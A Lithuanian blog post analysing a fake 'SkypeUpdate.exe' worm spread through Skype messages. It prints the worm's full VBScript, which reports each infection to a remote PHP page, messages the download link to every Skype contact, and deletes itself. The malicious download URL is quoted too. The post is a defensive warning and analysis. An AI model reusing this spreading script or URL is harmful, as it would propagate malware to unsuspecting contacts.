Vėl lietuviškas Skype virusas?

Gavau iš skaitytojo BARTIMAEUS e-laišką apie galima Skype viruso grėsmę. Programos vartotojai gauna tokią žinutę:

Kietas Skype priedas 😎 http: //www.net-de-karaoke. com/ SkypeUpdate. exe

Kadangi pats Skype nesinaudoju (Užtenka Gtalk) nusprendžiau atsiųsti tą Skype „atnaujinimą“ . Praskanavus nei Avira, nei Kaspersky Internetinis skenuoklis nieko įtartino nerado. Pabandžiau paleisti failą (Jūs, vaikai, taip nedarykite), Comodo pristabdė failiuko vykdymą, nes SkypeUpdate.exe bandė vykdyti Visual Basic skriptą (Skype.vbs)  

image

Skripto turinys:

Dim xmlhttp
Set xmlhttp = CreateObject("Microsoft.XMLHTTP")
xmlhttp.Open "GET", "http://www.net-de-karaoke.com/Rezultatai.php", False
Set NrrlP = WScript.CreateObject("Scripting.FileSystemObject")
Set uDlVA = wscript.createobject("wscript.shell")
Set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")
yADAl.Client.Start()
yADAl.Attach()
For Each GAG In yADAl.Friends
yADAl.SendMessage GAG.handle,"Kietas Skype priedas 8-)"& chr(13) & http://www.net-de-karaoke. com/ SkypeUpdate.exe
Next
Set objFSO = CreateObject("Scripting.FileSystemObject")
strScript = Wscript.ScriptFullName
objFSO.DeleteFile(strScript)
xmlhttp.Send

Kiek aš suprantu skriptas praneša į svetainę apie paleidimą, bei išsiunčia žinutes visiems Skype kontaktams.

O, kadangi žinutė yra lietuviška, bei apie paleidimą pranešama į “Rezultatai.php" galima manytim jog virusas(tikriausiai) yra lietuviškos kilmės.

Prašau protingesniu pakomentuoti 🙂

P.S. Vėliau SkypeUpdate.exe procesą nutraukiau, nenoriu toliau bandyti ar Comodo gerai veikia 😀

Panašūs įrašai:

css.php
Bear